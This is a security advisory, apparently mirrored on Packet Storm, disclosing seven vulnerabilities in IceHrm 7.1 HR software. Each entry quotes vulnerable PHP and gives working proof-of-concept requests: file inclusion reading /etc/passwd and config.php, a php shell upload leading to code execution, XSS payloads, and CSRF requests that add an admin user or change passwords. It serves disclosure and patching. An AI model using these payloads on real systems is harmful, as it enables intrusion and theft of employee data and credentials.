exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

IceHrm 7.1 LFI / CSRF / XSS / Shell Upload

IceHrm 7.1 LFI / CSRF / XSS / Shell Upload
Posted Dec 8, 2014
Authored by LiquidWorm | Site zeroscience.mk

IceHrm versions 7.1 and below suffer from cross site request forgery, cross site scripting, local file inclusion, and code execution via remote shell upload vulnerabilities.

tags | exploit, remote, shell, local, vulnerability, code execution, xss, file inclusion, csrf
SHA-256 | 024f8950b2d8a7df093e5e5fcd5b56896e32300bcfc56a9697f9bf47fb17d0d4

IceHrm 7.1 LFI / CSRF / XSS / Shell Upload

Change Mirror Download

IceHrm <=7.1 Multiple Vulnerabilities


Vendor: IceHRM
Product web page: http://www.icehrm.com
Affected version: <= 7.1


Summary: IceHrm is Human Resource Management web software
for small and medium sized organizations. The software is
written in PHP. It has community (free), commercial and
hosted (cloud) solution.

Desc: IceHrm <= 7.1 suffers from multiple vulnerabilities
including Local File Inclusion, Cross-Site Scripting, Malicious
File Upload, Cross-Site Request Forgery and Code Execution.

Tested on: Apache/2.2.15 (Unix)
PHP/5.3.3
MySQL 5.1.73


Vulnerabilities discovered by Stefan 'sm' Petrushevski
@zeroscience


Advisory ID: ZSL-2014-5215
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5215.php


01.12.2014

---


1. Local File Inclusion (LFI)
#####################################################
File:
app/index.php

Vulnerable code:
---- snip ----
include APP_BASE_PATH.'/'.$group.'/'.$name.'/index.php';
app/?g=../&n=../../../../etc/passwd%00
---- snip ----

Proof of Concept (PoC):
http://zsltest/icehrm/app/?g=../&n=../../../../etc/passwd%00

Severity: CRITICAL
#####################################################


2. Local File Inclusion (LFI)
#####################################################
File:
service.php

Vulnerable code:
---- snip ----
if($action == 'download'){
$fileName = $_REQUEST['file'];
$fileName = CLIENT_BASE_PATH.'data/'.$fileName;
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename='.basename($fileName));
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($fileName));
ob_clean();
flush();
readfile($fileName);
---- snip ----

Proof of Concept (PoC):
http://zsltest/icehrm/app/service.php?a=download&file=../config.php

Severity: CRITICAL
#####################################################


3. Malicious File Upload / Code Execution
#####################################################
File:
fileupload.php

Vulnerable code:
---- snip ----
//Generate File Name
$saveFileName = $_POST['file_name'];
if(empty($saveFileName) || $saveFileName == "_NEW_"){
$saveFileName = microtime();
$saveFileName = str_replace(".", "-", $saveFileName);
}

$file = new File();
$file->Load("name = ?",array($saveFileName));

// list of valid extensions, ex. array("jpeg", "xml", "bmp")

$allowedExtensions = explode(',', "csv,doc,xls,docx,xlsx,txt,ppt,pptx,rtf,pdf,xml,jpg,bmp,gif,png,jpeg");
// max file size in bytes
$sizeLimit =MAX_FILE_SIZE_KB * 1024;
$uploader = new qqFileUploader($allowedExtensions, $sizeLimit);
$result = $uploader->handleUpload(CLIENT_BASE_PATH.'data/',$saveFileName);
// to pass data through iframe you will need to encode all html tags

if($result['success'] == 1){
$file->name = $saveFileName;
$file->filename = $result['filename'];
$file->employee = $_POST['user']=="_NONE_"?null:$_POST['user'];
$file->file_group = $_POST['file_group'];
$file->Save();
$result['data'] = CLIENT_BASE_URL.'data/'.$result['filename'];
$result['data'] .= "|".$saveFileName;
$result['data'] .= "|".$file->id;
}
---- snip ----

Proof of Concept (PoC) method:
1. Change the 'file_name' request parameter in desired filename. The file will be saved in 'data' folder.
Example: file_name = dsadsa.php ==will be saved in==> data/dsadsa.php.txt
2. Create a malicious file (php shell) save it with .txt extension
3. Upload the malicious file (php shell) via the upload form in fileupload_page.php. The file will appear in ‘data’ folder as dsadsa.php.txt.
4. Access the file – http://zsltest/icehrm/data/dsadsa.php.txt to execute the php code.

PoC example:
1. http://zsltest/icehrm/app/fileupload_page.php?id=xxx.php&msg=Upload%20Attachment&file_group=EmployeeDocument&file_type=all&user=1
2. xxx.txt contents:
<?php phpinfo(); ?>
3. Upload the filename
4. Access the file:

Severity: CRITICAL
#####################################################


4. Cross-Site Scripting (XSS)
#####################################################
File:
login.php

Vulnerable code:
---- snip ----
<script type="text/javascript">
var key = "";
<?php if(isset($_REQUEST['key'])){?>
key = '<?=$_REQUEST['key']?>';
key = key.replace(/ /g,"+");
<?php }?>
---- snip ----

Proof of Concept (PoC):
http://zsltest/icehrm/app/login.php?key=';</script><script>alert(‘zsl’);</script>

Severity: MEDIUM
#####################################################


5. Cross-Site Scripting (XSS)
#####################################################
File:
fileupload_page.php

Vulnerable code:
---- snip ----
<div id="upload_form">
<form id="upload_data" method="post" action="<?=CLIENT_BASE_URL?>fileupload.php" enctype="multipart/form-data">
<input id="file_name" name="file_name" type="hidden" value="<?=$_REQUEST['id']?>"/>
<input id="file_group" name="file_group" type="hidden" value="<?=$_REQUEST['file_group']?>"/>
<input id="user" name="user" type="hidden" value="<?=$_REQUEST['user']?>"/>
<label id="upload_status"><?=$_REQUEST['msg']?></label><input id="file" name="file" type="file" onChange="if(checkFileType('file','<?=$fileTypes?>')){uploadfile();}"></input>

---- snip ----

Vulnerable parameters: id, file_group, user, msg

Proof of Concept (PoC):
http://zsltest/icehrm/fileupload_page.php?id=XXXX%22%3E%3Cscript%3Ealert(‘zsl’)%3C/script%3E

Severity: MEDIUM
#####################################################


6. Information Disclosure / Leaking Sensitive User Info
#####################################################
Users’/employees’ profile images are easily accessible in the ‘data’ folder.

Proof of Concept (PoC):
http://192.168.200.119/icehrm/app/data/profile_image_1.jpg
http://192.168.200.119/icehrm/app/data/profile_image_X.jpg <- x=user id

Severity: LOW
#####################################################


7. Cross-Site Request Forgery (CSRF)
#####################################################
All forms are vulnerable to CSRF.

Documents library:
http://localhost/icehrm/app/service.php
POST
document=2&valid_until=&status=Inactive&details=detailz&attachment=attachment_evi4t3VuKqDfyY&a=add&t=EmployeeDocument

Personal info:
http://localhost/icehrm/app/service.php
GET
t=Employee
a=ca
sa=get
mod=modules=employees
req={"map":"{\"nationality\":[\"Nationality\",\"id\",\"name\"],\"employment_status\":[\"EmploymentStatus\",\"id\",\"name\"],\"job_title\":[\"JobTitle\",\"id\",\"name\"],\"pay_grade\":[\"PayGrade\",\"id\",\"name\"],\"country\":[\"Country\",\"code\",\"name\"],\"province\":[\"Province\",\"id\",\"name\"],\"department\":[\"CompanyStructure\",\"id\",\"title\"],\"supervisor\":[\"Employee\",\"id\",\"first_name+last_name\"]}"}

Add new admin user:
http://localhost/icehrm/app/service.php
POST
username=test5&email=test5%40zeroscience.mk&employee=1&user_level=Admin&a=add&t=User

Change password of user:
http://localhost/icehrm/app/service.php?
GET
t=User
a=ca
sa=changePassword
mod=admin=users
req={"id":5,"pwd":"newpass"}

Add/edit modules:
http://localhost/icehrm/app/service.php
POST
t=Module&a=get&sm=%7B%7D&ft=&ob=

Severity: LOW
#####################################################
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close